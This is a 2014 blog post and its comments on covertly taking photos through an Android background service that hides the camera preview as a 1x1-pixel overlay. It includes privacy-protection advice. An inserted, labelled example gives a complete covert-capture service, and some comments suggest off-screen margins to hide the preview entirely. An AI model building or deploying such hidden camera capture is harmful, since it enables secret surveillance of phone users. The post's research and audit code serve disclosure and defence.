Thursday, May 22, 2014

Exploring limits of covert data collection on Android: apps can take photos with your phone without you knowing.

SHORT VERSION: Android apps can take photos with your phone in the background without displaying any notification, and you won't see the app in the list of installed applications. The app can then send the photos over the internet to a private server. You can also find a video demo in this post.

Introduction (camera)

I discovered this almost by accident while doing a team project for a Computer and Network Security course at my university. The project, suggested by a colleague of mine (Predrag Gruevski), was mostly about using cameras on PCs without turning on the indicator light. There were already promising findings in this field (the iSeeYou paper discussed doing so on old Mac models). Since the project was relatively general, each member of our team took a different approach. I initially started with low-level USB hacking, but despite genuine efforts I found nothing really interesting. Further experiments seemed really boring to me, because in general they involved trying various cameras and staring at the LED for hours hoping it won't blink.


I switched my focus to Android. Initial research was promising. There are many apps on the Play Store (for iPhone users: think App Store) that aim at taking pictures without any visual indication (ACLU-NJ Police Tape, Mobile Hidden Camera and more), but from what I found all of them require the app's activity to be visible and the phone screen to be on. Some of them manage to record video without a visible preview.

Technical Details

What I wanted was to take pictures without the user knowing, and at any time, not only when the app is in the foreground. I started googling, and the first thing I found is that the Camera API technically requires a preview to be displayed on the screen in order to capture video, and the same restriction applies to taking still pictures; background services, however, have no associated visible activity. But let's not get discouraged and keep trying. I wrote a small camera app for my Nexus 5. My first approach was to create a View object that is not attached to any activity and feed the preview to that object. That fails (I literally get a "take picture failed" exception). Then I remembered something that later turned out to be very relevant: Facebook Messenger draws on the screen (its chat heads) even when the app is not technically running:

This turned out to be indeed the right track. I attached the preview to the screen from the background service, and I was indeed able to take a photo! This is not yet ideal: the preview is visible on the screen, so the user can clearly see that something is going on. So I tried to remove it. Here's a list of approaches:

  • Make the preview invisible - failed: Android just ignores this setting for the preview
  • Make the preview transparent - failed: Android just ignores this setting for the preview
  • Cover the preview with another view - partially failed: the view on top still obstructs the screen
  • Make the preview 1x1 pixel - successful
The result was amazing and scary at the same time: the pixel is virtually impossible to spot on the Nexus 5 screen (even when you know where to look)! It also turned out that even if you turn the screen completely off, you can still take photos, as long as the pixel is still there.
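A minimal background service implementing the approach above, added here as an illustration; it is not the post's own (unpublished) code. It assumes that the 1x1 preview is attached from the service as a SurfaceView added through WindowManager with the SYSTEM_ALERT_WINDOW permission (the post does not say how the preview was attached; this is the usual way to draw over other apps), that the manifest declares android.permission.CAMERA and android.permission.SYSTEM_ALERT_WINDOW, and that the package name and output file name are placeholders.

```java
// Added example (not the original post's code): a Service that attaches a
// 1x1 pixel camera preview on top of all windows and takes one photo.
// Assumptions: android.hardware.Camera (the API of 2014), an overlay window
// that needs SYSTEM_ALERT_WINDOW, and CAMERA declared in the manifest.
package com.example.covertcam;   // hypothetical package name

import android.app.Service;
import android.content.Context;
import android.content.Intent;
import android.graphics.PixelFormat;
import android.hardware.Camera;
import android.os.IBinder;
import android.view.Gravity;
import android.view.SurfaceHolder;
import android.view.SurfaceView;
import android.view.WindowManager;
import java.io.File;
import java.io.FileOutputStream;
import java.io.IOException;

public class OnePixelCameraService extends Service implements SurfaceHolder.Callback {
    private WindowManager windowManager;
    private SurfaceView preview;
    private Camera camera;

    @Override
    public void onCreate() {
        super.onCreate();
        windowManager = (WindowManager) getSystemService(Context.WINDOW_SERVICE);
        preview = new SurfaceView(this);
        preview.getHolder().addCallback(this);   // surfaceCreated() starts the capture

        // A 1x1 px window drawn over everything. Making the preview invisible or
        // transparent is ignored for camera previews (see the list above), but a
        // single pixel in the top-left corner is practically impossible to notice.
        WindowManager.LayoutParams params = new WindowManager.LayoutParams(
                1, 1,
                WindowManager.LayoutParams.TYPE_SYSTEM_ALERT,   // requires SYSTEM_ALERT_WINDOW
                WindowManager.LayoutParams.FLAG_NOT_FOCUSABLE
                        | WindowManager.LayoutParams.FLAG_NOT_TOUCHABLE,
                PixelFormat.TRANSLUCENT);
        params.gravity = Gravity.TOP | Gravity.START;
        windowManager.addView(preview, params);
    }

    @Override
    public void surfaceCreated(SurfaceHolder holder) {
        try {
            camera = Camera.open();            // back camera; Camera.open(id) selects another
            camera.setPreviewDisplay(holder);  // takePicture() fails without a live preview
            camera.startPreview();
            camera.takePicture(null, null, new Camera.PictureCallback() {
                @Override
                public void onPictureTaken(byte[] jpeg, Camera cam) {
                    savePicture(jpeg);         // an uploader would send the bytes from here
                    releaseCamera();
                    stopSelf();
                }
            });
        } catch (IOException | RuntimeException e) {
            // Camera.open() throws RuntimeException when the camera is in use.
            releaseCamera();
            stopSelf();
        }
    }

    private void savePicture(byte[] jpeg) {
        // Private app storage; the file name is a placeholder.
        File out = new File(getFilesDir(), "capture_" + System.currentTimeMillis() + ".jpg");
        try (FileOutputStream fos = new FileOutputStream(out)) {
            fos.write(jpeg);
        } catch (IOException ignored) {
        }
    }

    private void releaseCamera() {
        if (camera != null) {
            camera.stopPreview();
            camera.release();
            camera = null;
        }
        if (preview != null) {
            // Clear the field first: removeView() triggers surfaceDestroyed(),
            // which calls back into this method.
            SurfaceView v = preview;
            preview = null;
            windowManager.removeView(v);
        }
    }

    @Override public void surfaceChanged(SurfaceHolder h, int fmt, int w, int hgt) { }
    @Override public void surfaceDestroyed(SurfaceHolder h) { releaseCamera(); }
    @Override public IBinder onBind(Intent intent) { return null; }
    @Override public void onDestroy() { releaseCamera(); super.onDestroy(); }
}
```

The service is started with startService(new Intent(context, OnePixelCameraService.class)) from anywhere in the app, including a BroadcastReceiver, which is how an app restarts after "force stop" (see the protection section below). Two caveats for readers on newer Android versions: from Android 6.0 SYSTEM_ALERT_WINDOW is a special permission the user must grant in Settings and CAMERA is a runtime prompt, TYPE_SYSTEM_ALERT was replaced by TYPE_APPLICATION_OVERLAY in Android 8.0, and from Android 9 apps in the background cannot access the camera at all, so this specific trick no longer works on current releases.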


If you cannot see the video, here's a direct link:

How can you protect yourself from malicious apps?

If you are as disturbed by this finding as I am, you will start asking what we can do to avoid such situations. The bad news is that it's a cat and mouse game: no matter how hard you try, attackers can find more ways to obfuscate malicious activity. The good news is that there are some measures that seem (at least given my current knowledge) hard to circumvent:

  1. Pay attention to permissions (for example, does Simple Notepad* really need access to your camera?).
  2. Keep your Google account secure: if somebody can access your Google account, they can install apps on your phone remotely without you approving it! Set up two-step verification, use a strong password and change it from time to time.
  3. Uninstall unused apps.
  4. High battery consumption (Settings -> Battery) and high bandwidth usage (Settings -> Data usage) are potential indicators that something is running in the background.
  5. Look at the background services that are running (Settings -> Apps -> Running): does Simple Notepad* really require a background service?
  6. Swiping an app out of the recent applications list does not stop its background services. If you want to stop it completely, go to App Info (long-press the app icon in the app drawer and drag it to the App info target) and tap Force stop; this ensures no background services are running. As @LB points out, the effect of "force stop" is not permanent (technically, the service can be started again by registering for and receiving an intent); only disabling or uninstalling the app is.
*Simple Notepad is a made-up example; I am not referring to any app in particular.
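For point 1, an added example (not from the post) of turning "pay attention to permissions" into a repeatable check: a small command-line tool that reads the output of `adb shell dumpsys package packages` and lists packages requesting CAMERA, SYSTEM_ALERT_WINDOW and INTERNET together, the combination the technique above needs to take and upload photos. The embedded sample input is constructed to follow the layout of that command's "requested permissions:" section on Android 6.0 and later (older releases format the section differently); the package names are invented.

```java
// Added example (not the original post's code): flag installed packages that
// request the permission combination a background photo-uploader needs.
// Input: text of `adb shell dumpsys package packages` (a file path argument),
// or the constructed sample below when run without arguments.
import java.io.IOException;
import java.nio.charset.StandardCharsets;
import java.nio.file.Files;
import java.nio.file.Paths;
import java.util.ArrayList;
import java.util.Arrays;
import java.util.HashSet;
import java.util.LinkedHashMap;
import java.util.List;
import java.util.Map;
import java.util.Set;
import java.util.regex.Matcher;
import java.util.regex.Pattern;

public class CovertCameraAudit {
    // Camera access, drawing over other apps, and a way to exfiltrate the photos.
    static final Set<String> SUSPICIOUS = new HashSet<>(Arrays.asList(
            "android.permission.CAMERA",
            "android.permission.SYSTEM_ALERT_WINDOW",
            "android.permission.INTERNET"));

    private static final Pattern PACKAGE_HEADER =
            Pattern.compile("^\\s*Package \\[([^\\]]+)\\]");
    private static final Pattern PERMISSION_LINE =
            Pattern.compile("^\\s+(android\\.permission\\.[A-Z_]+)\\s*$");

    /** Parse dumpsys text into package name -> set of requested permissions. */
    static Map<String, Set<String>> parseRequestedPermissions(String dump) {
        Map<String, Set<String>> result = new LinkedHashMap<>();
        String current = null;
        boolean inRequested = false;
        for (String line : dump.split("\n")) {
            Matcher m = PACKAGE_HEADER.matcher(line);
            if (m.find()) {                       // "  Package [com.foo] (hash):"
                current = m.group(1);
                result.put(current, new HashSet<String>());
                inRequested = false;
                continue;
            }
            if (current == null) continue;        // text before the first package
            String trimmed = line.trim();
            if (trimmed.equals("requested permissions:")) { inRequested = true; continue; }
            if (trimmed.endsWith(":")) { inRequested = false; continue; } // next section
            if (inRequested) {
                Matcher p = PERMISSION_LINE.matcher(line);
                if (p.find()) result.get(current).add(p.group(1));
            }
        }
        return result;
    }

    /** Packages that request every permission in SUSPICIOUS. */
    static List<String> flag(Map<String, Set<String>> perms) {
        List<String> flagged = new ArrayList<>();
        for (Map.Entry<String, Set<String>> e : perms.entrySet()) {
            if (e.getValue().containsAll(SUSPICIOUS)) flagged.add(e.getKey());
        }
        return flagged;
    }

    // Constructed sample: not real device output, but shaped like dumpsys text.
    static final String SAMPLE = String.join("\n",
            "Packages:",
            "  Package [com.example.simplenotepad] (3f1a2b):",
            "    userId=10052",
            "    requested permissions:",
            "      android.permission.CAMERA",
            "      android.permission.INTERNET",
            "      android.permission.SYSTEM_ALERT_WINDOW",
            "    install permissions:",
            "      android.permission.INTERNET: granted=true",
            "  Package [com.example.flashlight] (7c9d0e):",
            "    requested permissions:",
            "      android.permission.CAMERA",
            "      android.permission.FLASHLIGHT",
            "  Package [com.example.weather] (a1b2c3):",
            "    requested permissions:",
            "      android.permission.INTERNET",
            "      android.permission.ACCESS_FINE_LOCATION");

    public static void main(String[] args) throws IOException {
        String dump = args.length > 0
                ? new String(Files.readAllBytes(Paths.get(args[0])), StandardCharsets.UTF_8)
                : SAMPLE;
        for (String pkg : flag(parseRequestedPermissions(dump))) {
            System.out.println("review: " + pkg
                    + " requests CAMERA + SYSTEM_ALERT_WINDOW + INTERNET");
        }
    }
}
```

Run it with `adb shell dumpsys package packages > dump.txt` followed by `java CovertCameraAudit dump.txt`. A hit is a package to review, not proof of misuse: a "find my stolen phone" app legitimately wants exactly this combination, as one of the comments below notes, and an app that asks for fewer permissions may still have another route to the camera. On Android 6.0 and later the overlay permission is granted separately under "Draw over other apps", so that settings screen is a second place to look.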

(hopefully constructive) criticism of Android design decisions

Let me start by saying that I really like the Android SDK (except maybe the fact that it's Java, but I understand the logic behind that decision). It's nice because it gives developers a lot of power. There are some things that are possible on Android that simply would not be possible on other platforms.

However, given that privacy is more and more of a growing concern, it would be nice to adjust accordingly. In my opinion privacy can be achieved through transparency without sacrificing comfort. I can imagine use cases where I want an app to take photos from a background service. But I think it's inexcusable that the user is not notified about this fact. Android has a very nice notification bar, and users are very used to it. Why not make use of it here? The same goes for sound recording, location recording etc.

Another thing I think the Android team should look into is modern security research. There are a lot of ways of using data without direct access to it. A very simple example: an app could send emails to users without ever learning their email addresses, with Google acting as an intermediary.

All of those suggestions can be summarized in one sentence: please put more effort into ensuring users' privacy.


  1. Great research Szymon! Willing to look deeper into the code and/or implementations, cheers from México!

    1. I am still unsure if I should publish the code...

    2. I wouldn't do that. It's creepy enough to know that it works.

    3. For me, this is not a bug. It's a feature. There are many tutorials on how to get camera pictures without displaying the preview, for example: (For more examples or different ways of doing it, just Google: android take picture without preview)

  2. Yep. Hold the code close. No need to feed the CopyKidlets. I'm sure there will be similar exploit code out there but hopefully the holders of such code will be much smaller.

  3. Hi Szymon, thanks for sharing this issue! Actually, I developed an app a month ago that does the same thing. It's a big security issue. Do you think we can contact Google?
    Happy to be in contact with you in any way.


    1. This comment has been removed by the author.

    2. I can send you an APK to confirm that?

    3. This comment has been removed by the author.

    4. Hey! I actually already emailed

      btw. I also understand that there are more people that were aware of this (I am not surprised actually - it's not that hard to find) - sorry for taking all the credit for this. If you want, email me and I can link to your project in my post.

    5. Thanks so much for your words, Szymon! Actually, I emailed after I posted my comment here. I wanted to help you protect users' privacy. My project is under construction and not published yet. Anyway, I will be happy to stay in contact with you.

  4. Cerberus does exactly this and I want it to do that since this is an app that can allow me to track my phone if it gets stolen. So while I understand this is a problem if an app like this gets on your phone without your knowledge, it's necessary for other apps. If Android were to perform this action natively through Android Device Manager, I would be more open to removing this capability. But not until then.

  5. You can redirect the preview to an OpenGL texture (texture surface). This is very handy if you want to display effects instantly during the preview. However, this seems to be more handy to achieve what you want: just don't display the texture at all.

  6. You may find that Office Anti-Spy can stop anyone from taking control both of an Android phone's cameras, microphones and recording capability. Check out

  7. Congratulations on rediscovering the most widely used method for utilizing CV in android! :p

    The standard Android Camera API is quite bad, so we remove the standard preview and process the raw camera data ourselves to bypass it, works far better.

    It is of no security concern as long as you actually read the permissions for an app before you install it.


    And here is an app I did a year ago using this:


  8. Some things about your technique:
    1. Since there is no notification, your service runs in the background, so it can easily be killed when there aren't a lot of system resources (try playing a game, for example).
    2. I think that you can even avoid showing the pixel at all, by setting the margin value of the layoutParams of its window so that it is outside of the screen.
    I assume you did the on-top camera preview by using another permission called "SYSTEM_ALERT_WINDOW", which allows drawing on top of all windows.
    3. This is not quite a security bug. It's something the user knows he has confirmed when he installed the app.
    In fact, this is a feature some security apps have (like taking a photo of the thief when he opens the device).
    The user isn't aware of many things the apps do in the background.
    4. Force-stop only stops an app temporarily. It can wake itself using outside intents (like calls).
    You need to either disable it or uninstall it.

    1. Hi LB,

      Those are all good remarks. In particular, no. 4 is an important remark that I think people should be aware of; I incorporated it into the post body.


  9. Did you do that on purpose?

    "Simple Notepad" is the fake app name used by "Mobile Hidden Camera ", an app designed to let people use their phones to take photos and videos in public surreptitiously. Been on play Store for quite a while.

    If it wasn't on purpose it's a heck of a coinkydink.

  10. Awesome job, man, I've talked about your work on my website. Cheers!

  11. Hehehe, you look like ERLICH BACHMANN "El Peludo"/"The J-2000: Steve Jobs 2.0". Nice work with that code, I hope you can give me a copy just to learn a bit more.

  12. Great job, man, it was amazing...

  13. Having made a torch app (torch activation requires camera on), I can confirm that you can hide the view completely by adding a negative margin to the SurfaceView

  14. Hi Szymon,
    The more technological phones (and tablets) get, the more concerned you should be about security failures, because there will always be a way to cheat the rules without breaking them (like the 1x1 pixel preview).
    It would be great if, nowadays, turning off our phones really meant that no app would keep running.
    Great job.

  15. This comment has been removed by a blog administrator.


  17. This comment has been removed by a blog administrator.

  18. This comment has been removed by a blog administrator.

  19. Can you teach me? I wanna play a prank on my friend hahahah

  20. I read all you gurus' comments but I have a very simple something over your phone when it is lying down!!!!!!!



  24. You can install an app like "Cameraless" and you are safe!


  26. Hi Szymon,
    Can you contact me via my email?
    I have a deal to make with you.
    We can talk through email. I await your email.
    Hope to hear from you soon.
    See you.

  27. Back before cell phones, SLR cameras all had lens caps. Why don't manufacturers of Cell Phone cases make them with sliding lens caps?
    I made one for my last Samsung S4. It was cut (using a Dremel) from the stainless sliding door from an old 3.5" floppy. It had a fingernail pull and fit between the inner soft shell and outer hard shell of an Otterbox protector case.
    I had purchased three of those phones at the same time for my family. Only mine had the lens cap which I installed 3 days after getting the phones. Two days after putting the lens cap on, my phone got a pop-up message saying that if there were anything wrong with my phone or not working properly I should return it to my service provider while it was under warranty. My phone with the lens cap was the only one of the three to get that message. Someone was trying to use my camera remotely.


  29. Can you tell me: if we use our normal camera to capture images or video, does that also get transferred to a private server or not?




  33. Thanks for share with us because it's something that i've to learn as soon as possible, very useful




  38. Hi Szymon,

    Could you help me with your project link, maybe over Git?
    I am actually researching permission issues with Android apps.
    It would be very helpful to be able to replicate such an issue.







